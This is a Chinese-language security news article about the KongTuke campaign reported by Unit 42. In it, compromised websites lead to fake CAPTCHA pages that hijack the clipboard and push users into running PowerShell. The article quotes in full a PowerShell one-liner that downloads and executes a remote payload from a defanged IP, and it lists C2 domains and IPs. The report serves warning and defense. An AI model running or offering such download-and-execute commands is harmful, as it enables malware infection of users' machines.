紧急！KongTuke 攻击链借虚假验证码窃取用户信息

网络安全研究人员发现了一种复杂的新型网络攻击链，名为 KongTuke，它通过被攻陷的合法网站，瞄准毫无防备的互联网用户。

Palo Alto Networks Unit 42 团队的 Bradley Duncan 在一份报告中详细介绍了这种攻击方式。该攻击利用恶意脚本和虚假验证码页面，劫持受害者的剪贴板，并有可能安装不明恶意软件。

这些研究结果于 2025 年 4 月 4 日公布，Unit 42 Intel 在 X 平台（原推特）上发布了更多相关见解，凸显了这场攻击活动日益增长的威胁。

攻击链

KongTuke 攻击始于将恶意脚本注入合法但易受攻击的网站。报告中提到的一个例子是 hxxps://lancasternh [.] com/6t7y.js，它会将用户重定向到 hxxps://lancasternh [.] com/js.php 的二级脚本。

这个脚本会收集受害者设备的详细信息，包括 IP 地址、浏览器类型和引用数据，并以 base64 格式进行编码。

之后，用户会被引导至一个模仿验证码（一种用于区分人类和机器人的常见安全功能）的欺骗性 “验证您是人类” 页面。

然而，这个验证码是个骗局。该页面并非用于验证身份，而是采用了一种名为 “剪贴板劫持” 或 “粘贴劫持” 的技术。它会秘密地将一个恶意 PowerShell 脚本注入受害者的剪贴板，并附带指令，敦促用户通过 Windows 运行窗口粘贴并执行该脚本。

Duncan 详细描述的脚本内容如下：

powershell -w h -c “iex $(irm 138.199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime](’01/01/’ + ‘1970’)); $x = ($z – $y).TotalSeconds; $w = [math]::Floor($x); $v = $w – ($w % 16); [int64]$v))”

这条命令会连接到 138.199.156 [.] 22:8080 的远程服务器，根据时间戳计算来获取更多恶意负载。

流量及感染后活动

根据 Unit 42 的报告，一旦脚本被执行，就会发起一系列网络请求。初始流量包括对同一 IP 地址的 GET 和 POST 请求，随后会连接到诸如 ecduutcykpvkbim [.] top 和 bfidmcjejlilflg [.] top 等域名。

这些由 185.250.151 [.] 155:80 托管的域名，似乎是进一步感染的临时据点。感染后，受感染的系统会通过 173.232.146 [.] 62:25658，以 TLSv1.0 HTTPS 流量与 8qvihxy8x5nyixj [.] top 建立命令与控制（C2）通信。

有趣的是，受感染主机还会使用 api.ipify [.] org 和 ipinfo [.] io 等服务进行 IP 地址查询，收集城市、地区和国家等地理位置数据。虽然这一步本身并非恶意行为，但这表明攻击者在对受害者进行特征分析，以便实施有针对性的攻击。

熟悉却难以捉摸的威胁

包括 Mastodon 上的 @monitorsg 和 ThreatFox 在内的网络安全社区，都在 #KongTuke 话题标签下追踪 KongTuke攻击活动。

Duncan 指出，感染后的流量模式与知名远程访问木马 AsyncRAT 的观测模式相似。

然而，最终的恶意软件负载仍未确定，因为研究人员尚未获取样本进行分析。这种不确定性凸显了威胁的不断演变，以及对抗它所面临的挑战。

2025 年 4 月 4 日，Unit 42 Intel 在 X 平台上向公众发出警报：“在合法但遭到感染的网站页面中注入 #KongTuke 脚本会导致伪造的 #CAPTCHA 样式页面和 #ClipboardHijacking （#pastejacking）。

这些页面会要求用户将恶意脚本粘贴到运行窗口中。” 该帖子可在 https://x.com/Unit42_Intel/status/1908253830166323637 访问，其中包含指向更多详细信息的链接以及虚假验证码页面的截图，强调了提高警惕的紧迫性。

报告作者 Bradley Duncan 在其报告中强调了这种攻击的阴险本质：“这个过程有时被称为‘剪贴板劫持’或‘粘贴劫持’，它以常规验证为幌子，诱使用户执行有害代码。”

利用被攻陷的合法网站增加了一层可信度，使得这种攻击尤为危险。

网络安全专家敦促用户在遇到验证码提示时要格外谨慎，尤其是那些要求手动执行脚本的验证码。合法的验证码通常是进行简单的任务，如图像选择，而不是复制粘贴代码。

用户还应保持系统更新，避免点击可疑链接，并使用强大的杀毒软件来检测和阻止此类威胁。

随着 KongTuke 攻击活动的持续演变，Unit 42 及其他研究人员正在努力识别最终的恶意软件，并破坏其攻击基础设施。目前，保持警惕仍是抵御这种狡猾地利用日常网络交互信任的最佳防御手段。